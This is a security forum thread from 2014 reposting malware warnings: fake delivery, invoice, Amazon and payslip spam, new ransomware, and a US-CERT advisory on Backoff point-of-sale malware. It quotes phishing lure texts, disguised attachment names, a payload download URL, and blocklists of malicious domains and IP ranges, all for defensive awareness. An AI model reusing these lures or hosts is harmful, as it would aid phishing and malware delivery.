    28 July 2014 - "Delivery failure , July 28, 2014 BN_3647007 pretending to come from UKmail Express is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    > http://printhut.co.uk/wp-content/upl..._mail_logo.jpg
    An urgent service package has come to the local post office. Delivery was rescheduled because our courier was not able to deliver the package [RECEIVER NOT PRESENT].
    You can find more information including contact details regarding your package in the attached file.
    Privacy Policy and
    Copyright © 2014 UKMail Group plc


    28 July 2014: BN_2118176.zip (83 kb) : Extracts to report_form2_28-07-2014.pdf.scr
    Current Virus total detections: 2/54* . This Delivery failure , July 28, 2014 BN_3647007 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/7...is/1406549984/
    ___

    Fake skipped invoice SPAM – word doc malware
    - http://myonlinesecurity.co.uk/skippe...d-doc-malware/
    28 July 2014 - "skipped invoice is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    HI Richie,
    Attached is invoice #2223 651.45 from May missed in check received.
    I am out of the office tomorrow and Monday so I’m emailing & begging for payment to make month end.
    Thanks & have a great weekend!
    Katherine Sargent / Credit Manager
    Pacemaker Steel and Piping Co., Inc. ...


    28 July 2014: invoice_28.07.zip ( 11kb) : Extracts to invoice_28.07.doc.exe
    Current Virus total detections: 5/54* . This skipped invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word.doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/1...is/1406569801/

    178.63.240.112: https://www.virustotal.com/en/ip-add...2/information/
    ___

    Fake Amazon order SPAM
    - http://blog.dynamoo.com/2014/07/amaz...rder-spam.html
    28 July 2014 - "This fake Amazon spam comes with a malicious attachment:
    Screenshot: https://2.bp.blogspot.com/-JqukbICRl...600/amazon.png

    Attached is a file Order-239-1744919-1697181.zip which in turn contains a malicious executable Order details 001-8821901-992107.exe which has a VirusTotal detection rate of 18/54*. The Comodo CAMAS analysis** shows that the malware reaches out to a familiar set of URLs*** to download further components... recommend blocking the following domains:
    zag .com.ua
    daisyblue .ru
    ricebox .biz
    brandsalted .com
    fbcashmethod .ru
    expositoresrollup .es
    madrasahhusainiyahkl .com
    sexyfoxy .ts6.ru
    huework .com
    siliconharbourng .com
    martijnvanhout .nl
    "
    * https://www.virustotal.com/en-gb/fil...is/1406572004/

    ** http://camas.comodo.com/cgi-bin/subm...753809cbbc5ac2

    *** http://blog.dynamoo.com/2014/07/tiff...july-spam.html

    Last edited by AplusWebMaster; 2014-07-28 at 23:34.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  8. #488
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Something evil on 31.210.96.155, ...156, ...157 and ...158

    FYI...

    Something evil on 31.210.96.155, ...156, ...157 and ...158 (31.210.96.152/29)
    - http://blog.dynamoo.com/2014/07/some...121096156.html
    29 July 2014 - "I don't know quite what the exploit kit of the month is here, but the IP addresses 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 are currently serving up malware using -hijacked- GoDaddy domains, and are targeting victim websites by altering their .htaccess files** to intercept traffic coming from search engines such as Google. These IP addresses have been used for malware for some time*...VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of an allocation 31.210.96.152/29 which I would very strongly recommend blocking that range... these appear to be subdomains of -hijacked- GoDaddy domains... I would recommend permablocking the following IP range and temporarily blocking the following domains:
    31.210.96.152/29 ..."
    (Long list at the dynamoo URL above.)
    * http://c-apt-ure.blogspot.co.uk/2014...ars-later.html

    ** http://www.symantec.com/connect/blog...ss-redirection

    1] 31.210.96.155: https://www.virustotal.com/en-gb/ip-...5/information/
    2] 31.210.96.156: https://www.virustotal.com/en-gb/ip-...6/information/
    3] 31.210.96.157: https://www.virustotal.com/en-gb/ip-...7/information/
    4] 31.210.96.158: https://www.virustotal.com/en-gb/ip-...8/information/

    Last edited by AplusWebMaster; 2014-07-29 at 19:52.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  9. #489
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake documents, Fake Amazon SPAM ...

    FYI...

    Fake 'documents ready for download' SPAM – PDF malware
    - http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    30 July 2014 - "Your documents are ready for download is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Your documents 6419165973846 are ready , please sign them and email them back.
    Thank you
    John Garret
    Level III Account Management
    817-768-8742 office
    817-874-8795 cell
    johngarret@ natwest .com
    Investments in securities and insurance products are:
    NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
    The security of personal information about you is our priority. We protect this information by maintaining physical, electronic, and procedural safeguards that meet applicable law. We train our employees in the proper handling of personal information. When we use other companies to provide services for us, we require them to protect the confidentiality of personal information they receive...


    30 July 2014: Documents_3922929617733.rar (10 kb) : Extracts to Documents.scr
    Current Virus total detections: 2/53* . This Your documents are ready for download is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1406710734/
    ___

    Fake "Amazon order" SPAM
    - http://blog.dynamoo.com/2014/07/amaz...r-spam_30.html
    30 July 2014 - "Another -fake- Amazon spam with a malicious payload:

    Screenshot: https://4.bp.blogspot.com/-zOkh76LGg...00/amazon4.png

    There's a ZIP file attached (in this case Order-853-9908013-4362599.zip) which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53*. The Comodo CAMAS report** shows that it downloads a further component...
    This second executable has a VT detection rate of 5/54***..."
    (Long recommended blocklist at the dynamoo URL above.)
    * https://www.virustotal.com/en-gb/fil...is/1406729013/

    ** http://camas.comodo.com/cgi-bin/subm...35633ec2b7f226

    *** https://www.virustotal.com/en-gb/fil...is/1406729311/
    ___

    Fake Order status 30.07.2014.xls – XLS malware
    - http://myonlinesecurity.co.uk/order-...e-xls-malware/
    30 July 2014 - "Order status -540130 30.07.2014.xls is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... An email received coming from a -random- name with -no- company details and a totally blank body and a subject of Order status -540130 30.07.2014.xls ( different order numbers ) with a zip attachment
    30 July 2014 : 540130-30.07.2014.zip ( 47 kb) : Extracts to order-8301138-30.07.2014.xls.exe
    Current Virus total detections: 9/54* . This Order status -540130 30.07.2014.xls is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Excel spreadsheet file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/c...is/1406736903/
    ___

    Fake "Payslip" SPAM
    - http://blog.dynamoo.com/2014/07/payslip-spam.html
    30 July 2014 - "... terseness works with this kind of message:
    From: Richard Mason [richardm254@ gmail .com]
    Date: 30 July 2014 21:23
    Subject: Payslip
    Please find attached the payment slip.
    Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

    > https://3.bp.blogspot.com/-G4xRic3PZ...I/s1600/js.png

    Clicking OK downloads an executable from www.greenexpress .ge/swift//payslip.exe which you are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..
    > https://3.bp.blogspot.com/-TfUbI6lM0.../s1600/js2.png
    ..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link because the attachment is Base 64 encoded... The malware itself has a VirusTotal detection rate of 31/53*... Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter..."
    * https://www.virustotal.com/en-gb/fil...is/1406754444/

    198.50.169.4: https://www.virustotal.com/en-gb/ip-...4/information/
    ___

    New Crypto-Ransomware in the wild
    - http://blog.trendmicro.com/trendlabs...e-in-the-wild/
    July 30, 2014 - "... new crypto-ransomware variants that use new methods of encryption and evasion... 'Cryptoblocker' will not drop any text files instructing the victim on how to decrypt the files. Rather, it displays the dialog box below. Entering a transaction ID in the text box will trigger a message stating that the “transaction was sent and will be verified soon.”:
    > http://blog.trendmicro.com/trendlabs...7/cryptob1.jpg
    ... This malware does not use CryptoAPIs, a marked difference from other ransomware. CryptoAPIs are used to make RSA keys, which were not used with this particular malware. This is an interesting detail considering RSA keys would make decrypting files more difficult. Instead, we found that the advanced encryption standard (AES) is found in the malware code. A closer look also reveals that the compiler notes were still intact upon unpacking the code... Based on feedback from the Trend Micro Smart Protection Network, the US is the top affected country, followed by France and Japan. Spain and Italy round up the top five affected countries.
    Countries affected by Cryptoblocker:
    > http://blog.trendmicro.com/trendlabs...fection-01.jpg
    ... These ransomware variants prove that despite significant takedowns, cybercriminals will continue to find ways to victimize users. Users should remain cautious when dealing with unfamiliar files, emails, or URL links. While it might be tempting to pay the ransom for encrypted files, there is no guarantee that the cybercriminals will decrypt the ransomed files..."

    Last edited by AplusWebMaster; 2014-07-31 at 03:49.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  10. #490
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Backoff... Malware

    FYI...

    Backoff... Malware
    Backoff Point-of-Sale Malware
    - https://www.us-cert.gov/ncas/alerts/TA14-212A
    July 31, 2014 - "... malicious actors are using publicly available tools to locate businesses that use remote desktop applications. Remote desktop solutions like Microsoft's Remote Desktop [1] Apple Remote Desktop,[2] Chrome Remote Desktop,[3] Splashtop 2,[4] Pulseway[5], and LogMEIn Join.Me[6] offer the convenience and efficiency of connecting to a computer from a remote location. Once these applications are located, the suspects attempted to brute force the login feature of the remote desktop solution. After gaining access to what was often administrator or privileged access accounts, the suspects were then able to deploy the point-of-sale (PoS) malware and subsequently exfiltrate consumer payment data via an encrypted POST request. USSS, NCCIC/US-CERT and Trustwave Spiderlabs have been working together to characterize newly identified malware dubbed "Backoff", associated with several PoS data breach investigations. At the time of discovery and analysis, the malware variants had low to -zero- percent anti-virus detection rates, which means that fully updated anti-virus engines on fully patched computers could -not- identify the malware as -malicious- ..."
    Description: “Backoff” is a family of PoS malware and has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary variants to the “Backoff” malware including 1.4, 1.55 (“backoff”, “goo”, “MAY”, “net”), and 1.56 (“LAST”). These variations have been seen as far back as October 2013 and continue to operate as of July 2014. In total, the malware typically consists of the following four capabilities. An exception is the earliest witnessed variant (1.4) which does not include keylogging functionality. Additionally, 1.55 ‘net’ removed the explorer.exe injection component:
    - Scraping memory for track data
    - Logging keystrokes
    - Command & control (C2) communication
    - Injecting -malicious- stub into explorer.exe
    The malicious stub that is -injected- into explorer.exe is responsible for persistence in the event the malicious executable crashes or is forcefully stopped. The malware is responsible for scraping memory from running processes on the victim machine and searching for track data. Keylogging functionality is also present in most recent variants of “Backoff”. Additionally, the malware has a C2 component that is responsible for uploading discovered data, updating the malware, downloading/executing further malware, and uninstalling the malware.
    Impact: The impact of a compromised PoS system can affect both the businesses and consumer by exposing customer data such as names, mailing addresses, credit/debit card numbers, phone numbers, and e-mail addresses to criminal elements. These breaches can impact a business’ brand and reputation, while consumers’ information can be used to make fraudulent purchases or risk compromise of bank accounts. It is critical to safeguard your corporate networks and web servers to prevent any unnecessary exposure to compromise or to mitigate any damage that could be occurring now.
    Solution: At the time this advisory is released, the variants of the “Backoff’ malware family are largely -undetected- by anti-virus (AV) vendors. However, shortly following the publication of this technical analysis, AV companies will quickly begin detecting the existing variants. It’s important to maintain up-to-date AV signatures and engines as new threats such as this are continually being added to your AV solution...
    (More detail at the us-cert URL above.)
    ___

    - http://blog.trendmicro.com/trendlabs...ff-targets-us/
    Aug 6, 2014
    Heat map of malicious communications found in affected US states
    > http://blog.trendmicro.com/trendlabs.../heatmap31.jpg

    - http://atlas.arbor.net/briefs/index#1443301999
    High Severity
    7 Aug 2014

    Last edited by AplusWebMaster; 2014-08-08 at 22:13.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •